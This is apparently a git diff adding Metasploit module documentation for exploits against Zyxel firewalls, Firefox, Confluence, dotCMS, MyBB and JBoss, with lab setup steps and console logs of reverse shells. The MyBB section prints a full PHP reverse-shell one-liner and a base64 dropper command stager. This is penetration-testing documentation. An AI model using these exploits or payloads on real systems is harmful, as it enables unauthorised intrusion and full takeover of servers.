+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set target 1
+target => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.28:8080/0g5aPNZ8DvT1n
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[*] Client 10.0.0.14 (curl/7.70.0) requested /0g5aPNZ8DvT1n
+[*] Sending payload to 10.0.0.14 (curl/7.70.0)
+[+] Deleted /tmp/hdpBYBRk
+[+] Deleted /tmp/OpTYd0c0
+[*] Meterpreter session 3 opened (10.0.0.28:4444 -> 10.0.0.14:50832) at 2022-05-13 12:00:01 -0700
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Resetting crontab to the original version
+[*] Server stopped.
+
+meterpreter > shell
+Process 29664 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
@@ -0,0 +1,69 @@
+## Vulnerable Application
+
+Mozilla Firefox before version 41 allowed users to install
+unsigned browser extensions from arbitrary web servers.
+
+This module dynamically creates an unsigned .xpi addon file.
+The resulting bootstrapped Firefox addon is presented to
+the victim via a web page. The victim's Firefox browser
+will pop a dialog asking if they trust the addon.
+
+Once the user clicks "install", the addon is installed and
+executes the payload with full user permissions. As of Firefox
+4, this will work without a restart as the addon is marked to
+be "bootstrapped". As the addon will execute the payload after
+each Firefox restart, an option can be given to automatically
+uninstall the addon once the payload has been executed.
+
+As of Firefox 41, unsigned extensions can still be installed
+on Firefox Nightly, Unbranded and Development builds when
+configured with `xpinstall.signatures.required` set to `false`.
+
+Note: this module generates legacy extensions which are
+supported only in Firefox before version 57.
+
+
+### Installation
+
+Download an old Developer Edition (version 4 < 57) installer from:
+
+* https://download-origin.cdn.mozilla.net/pub/devedition/releases/
+
+Browse to `about:config` and set `xpinstall.signatures.required` to `false`.
+
+Open Tools -> Options, search for "updates" and select "Never check for updates".
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
+1. Do: `set SRVHOST [IP]`
+1. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
+
+Run the module and load the web server URL in Firefox. Install the extension when prompted.
+
+```
+msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/Oj8qCs
+[*] Server started.
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > 
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Redirecting request.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending HTML response.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400
+```
@@ -0,0 +1,127 @@
+## Vulnerable Application
+This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate
+an OGNL expression resulting in OS command execution.
+
+Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information
+on affected and fixed versions, see [CONFSERVER-79000][1].
+
+### Setup
+
+1. Create a new `docker-compose.yml` file with the contents below.
+2. Startup the container using `docker-compose up`
+3. Navigate to the HTTP service running on port 8090
+4. Acquire and provide an evaluation license
+5. When prompted, setup a standalone / non-clustered system
+6. Configure the database settings
+    1. Select "By connection string", then Database URL: `jdbc:postgresql://postgresql:5432/confdb`
+    2. Username and password are both `confdb`
+7. Setup takes a few minutes
+8. When prompted, select "Empty Site"
+9. Select "Manage users and groups within Confluence"
+10. Create an account, it **will not** be needed for exploitation
+11. Once setup has completed select "Start" and set a space name to something
+
+#### Docker Compose File
+
+```
+version: '3'
+
+services:
+  postgresql:
+    image: postgres:11
+    environment:
+      POSTGRES_DB: confdb
+      POSTGRES_USER: confdb
+      POSTGRES_PASSWORD: confdb
+    ports:
+      - '5432:5432'
+
+  confluence-server:
+    depends_on:
+      - postgresql
+    image: atlassian/confluence:7.13.0
+    ports:
+      - '8090:8090'
+      - '8091:8091'
+```
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection`
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Confluence 7.13.0 in [Docker]
+
+```
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
+RHOSTS => 192.168.159.100
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
+[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.100
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > sysinfo
+Computer        : 5052c5eebf8a
+OS              : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
+[1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
@@ -0,0 +1,186 @@
+## Vulnerable Application
+
+### Description
+This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each
+respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
+
+### Clone and build a vulnerable version of dotCMS:
+This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
+1. `git clone https://github.com/dotCMS/core.git`
+1. `cd core`
+1. `git checkout 7d604e5 (this is vulnerable version 21.06)`
+1. `cd dotCMS/`
+1. `./gradlew createDist`
+```
+Starting a Gradle Daemon (subsequent builds will be faster)
+
+<output truncated>
+
+BUILD SUCCESSFUL in 12m 53s
+21 actionable tasks: 19 executed, 2 up-to-date
+```
+
+If the build was successful you should now have a vulnerable 21.06 linux and windows instance:
+```
+msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
+total 811132
+-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
+-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
+```
+
+Inside each of the above compressed directories exists a directory `dotserver` which contains the vulnerable app.
+
+### Ubuntu 20.04 install
+
+#### Install JAVA 1.8
+
+1. `export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"`
+1. `export PATH=$JAVA_HOME/bin:$PATH`
+1. `sudo apt-get install openjdk-8-jdk`
+
+#### Install Postgres
+
+1. `sudo apt install postgresql -y`
+1. `sudo -u postgres psql`
+1. Change the default database, username and password from `dotcms` to `postgres` (or create the db and user `dotcms`).
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties`
+```
+##Postgres default configuration
+driverClassName=org.postgresql.Driver
+jdbcUrl=jdbc:postgresql://localhost/postgres
+username=postgres
+password=postgres
+```
+
+#### Install Elastic Search
+
+1. `sudo apt install apt-transport-https ca-certificates wget`
+1. `wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -`
+1. `sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'`
+1. `sudo apt update`
+1. `sudo apt install elasticsearch`
+1. `sudo systemctl daemon-reload `
+1. `sudo systemctl enable elasticsearch.service`
+1. `sudo systemctl start elasticsearch.service`
+1. `sudo systemctl status elasticsearch.service`
+1. Edit `dotcms-config-cluster.properties` to ensure the following properties are set:
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties`
+```
+ES_ENDPOINTS=http://localhost:9200
+
+ES_PROTOCOL=http
+ES_HOSTNAME=localhost
+ES_PORT=9200
+
+ES_TLS_ENABLED=false
+```
+
+#### Run dotCMS
+
+1. `cd dotserver/tomcat-9.0.41/bin/`
+1. `chmod 755 *.sh`
+1. `catalina.sh run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+### Windows 10 install
+
+#### Install Java 1.8
+
+1. Download and follow wizard to install:
+    https://www.oracle.com/java/technologies/downloads/#license-lightbox
+
+#### Install Elasticsearch 8.2.0
+
+Download and follow wizard to install:
+https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip dotcms-config-cluster.properties
+1. Ensure dotcms-config-cluster.properties contains the same properties as specified above
+
+#### Install Postgres 10.21
+
+1. Download and follow wizard to install:
+    https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
+1. Ensure db.properties contains the same properties as specified above
+
+#### Run dotCMS
+
+1. `cd dotserver\tomcat-9.0.41\bin\`
+1. `catalina.bat run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+## Verification Steps
+1. `use multi/http/dotcms_file_upload_rce`
+2. `set RHOSTS [ips]`
+3. `set LHOST [ips]`
+4. `run`
+
+## Scenarios
+
+### Ubuntu 20.04 dotCMS 21.06:
+```
+msf6 > use exploit/multi/http/dotcms_file_upload_rce
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
+rhosts => 172.16.199.227
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
+[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Windows 10 dotCMS 21.06:
+```
+msf6 > use dotcms_file_upload_rce
+[*] Using exploit/multi/http/dotcms_file_upload_rce
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
+rhosts => 172.16.199.231
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
+[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19042.1706]
+(c) Microsoft Corporation. All rights reserved.
+-----
+
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
+whoami
+desktop-h1lncdm\administrator
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
+systeminfo
+
+Host Name:                 DESKTOP-H1LNCDM
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+
+<output truncated>
+```
+Note on windows the module reports an unknown result when trying to delete the files though it does successfully
@@ -0,0 +1,356 @@
+## Vulnerable Application
+
+This exploit module leverages an improper input validation vulnerability in
+MyBB prior to `1.8.30` to execute arbitrary code in the context of the user
+running the application.
+
+MyBB Admin Control setting page calls PHP `eval` function with an unsanitized
+user input. The exploit adds a new setting, injecting the payload in the
+vulnerable field, and triggers its execution with a second request. Finally, it
+takes care of cleaning up and removes the setting.
+
+Note that authentication is required for this exploit to work and the account
+must have rights to add or update settings (typically, myBB administrator
+role).
+
+## Installation Steps
+
+### Linux with Docker
+- Use this `docket-compose.yml` file (see [this](https://github.com/mybb/docker#-via-docker-stack-deploy-or-docker-compose)):
+```
+services:
+  mybb:
+    image: mybb/mybb:1.8.29
+    volumes:
+    - ${PWD}/mybb:/var/www/html:rw
+
+  nginx:
+    image: nginx:mainline-alpine
+    ports:
+    - published: 8080
+      target: 80
+    volumes:
+    - ${PWD}/nginx:/etc/nginx/conf.d:ro
+    - ${PWD}/mybb:/var/www/html:ro
+
+  postgresql:
+    environment:
+      POSTGRES_DB: mybb
+      POSTGRES_PASSWORD: changeme
+      POSTGRES_USER: mybb
+    image: postgres:14-alpine
+    volumes:
+    - ${PWD}/postgres/data:/var/lib/postgresql/data:rw
+
+version: '3.8'
+```
+- Create `nginx/default.conf`
+```
+  upstream mybb {
+      server mybb:9000 weight=5;
+  }
+
+  server {
+      listen 80;
+
+      root /var/www/html;
+      index index.html index.php;
+
+      location / {
+          try_files $uri $uri/ /index.php?$args;
+      }
+
+      location ~ inc/ {
+          internal;
+      }
+
+      location ~ ^/(images|cache|jscripts|uploads)/ {
+          access_log off;
+      }
+
+      location ~ \.php$ {
+          try_files $uri =404;
+          fastcgi_split_path_info ^(.+\.php)(/.+)$;
+          fastcgi_pass mybb;
+          fastcgi_index index.php;
+          include fastcgi_params;
+          fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+          fastcgi_param PATH_INFO $fastcgi_path_info;
+      }
+  }
+```
+- Run `docker-compose up`.
+- Access the application at `http://127.0.0.1:8080/install` and finish the installation process.
+
+### Windows with Nginx, PHP and MySQL
+- Install MySQL:
+  - Follow the installation process [here](https://dev.mysql.com/doc/refman/8.0/en/windows-installation.html)
+- Install PHP:
+  - Download PHP (Non Thread Safe) [here](http://windows.php.net/download/)
+  - Extract everything to `C:\php`
+  - run:
+```
+    cd C:\php
+    set PHP_FCGI_CHILDREN=5
+    set PHP_FCGI_MAX_REQUESTS=500
+    php-cgi.exe -b 127.0.0.1:9999
+```
+- Install Nginx:
+  - Download Nginx [here](http://nginx.org/en/download.html)
+  - Extract everything to `C:\nginx`
+  - Set the following options to `C:\nginx\nginx.conf`
+```
+    worker_processes  auto;
+    ...
+	server {
+        listen 80;
+
+        root www;
+        index index.html index.php;
+
+        location / {
+            try_files $uri $uri/ /index.php?$args;
+        }
+
+        location ~ inc/ {
+            internal;
+        }
+
+        location ~ ^/(images|cache|jscripts|uploads)/ {
+            access_log off;
+        }
+
+        location ~ \.php$ {
+            try_files $uri =404;
+            fastcgi_split_path_info ^(.+\.php)(/.+)$;
+            fastcgi_pass 127.0.0.1:9999;
+            fastcgi_index index.php;
+            include fastcgi_params;
+            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+            fastcgi_param PATH_INFO $fastcgi_path_info;
+        }
+	}
+```
+  - Run:
+```
+    cd C:\nginx
+    start nginx.exe
+```
+- Install MyBB
+  - Follow the installation process [here](https://docs.mybb.com/1.8/install/).
+
+## Verification Steps
+1. Install the application (see [Installation Steps](#installation-steps))
+1. Start msfconsole
+1. Do: `use exploit/multi/http/mybb_rce_cve_2022_24734`
+1. Do: `run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>`
+1. You should get a shell.
+1. Try again with a different targets
+
+## Options
+
+### USERNAME
+
+The username of a privileged MyBB account. It must have rights to add or update setting (usually with the administrator role)
+
+### PASSWORD
+
+The password of the MyBB account.
+
+## Scenarios
+
+### Windows (target 0 - PHP)
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (39860 bytes) to 192.168.1.215
+[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+
+meterpreter > sysinfo
+Computer    : DC02
+OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
+Meterpreter : php/windows
+```
+
+### Linux (target 0 - PHP)
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (39860 bytes) to 192.168.0.48
+[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+
+meterpreter > sysinfo
+Computer    : e087259940a8
+OS          : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
+Meterpreter : php/linux
+```
+
+### Linux (target 1 - Unix (In-Memory))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
+target => 1
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
+[*] Started reverse SSL handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200
+
+
+ls
+backups
+inc
+index.php
+jscripts
+modules
+styles
+^C
+Abort session 3? [y/N]  y
+```
+
+### Linux (target 2 - linux (Dropper))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (989032 bytes) to 192.168.0.48
+[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress - 100.00% done (763/763 bytes)
+
+meterpreter > sysinfo
+Computer     : 172.18.0.4
+OS           :  (Linux 5.10.76-linuxkit)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```
+
+### Windows (target 3 - Windows (In-Memory))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
+target => 4
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+
+[*] Powershell command length: 4160
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Sending stage (175174 bytes) to 192.168.1.215
+[*] Meterpreter session 6 opened (192.168.1.44:4444 -> 192.168.1.215:59025) at 2022-05-30 15:58:01 +0200
+
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 8
+Meterpreter     : x86/windows
+```
+
+
+### Windows (target 4 - Windows (Dropper))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
+target => 5
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress -   2.01% done (2046/101881 bytes)
+...
+[*] Command Stager progress -  98.40% done (100252/101881 bytes)
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (175174 bytes) to 192.168.1.215
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress - 100.00% done (101881/101881 bytes)
+[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200
+
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 8
+Meterpreter     : x86/windows
+```
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
  6.  Verify the module yields a PHP meterpreter session in < 5 minutes
  7.  Verify the malicious PHP file was automatically removed

+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios

  Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in JBOSS
+EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior.
+
+### Setup
+
+#### Dockerfile
+```dockerfile
+FROM jboss/base-jdk:8
+
+# Set the JBOSS_VERSION env variable
+ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
+ENV EAP_HOME /opt/jboss/jboss-as-6.1
+
+# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip content
+# https://jbossas.jboss.org/downloads 
+RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o /opt/jboss/jboss-as-6.1.0.zip
+RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
+&& mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
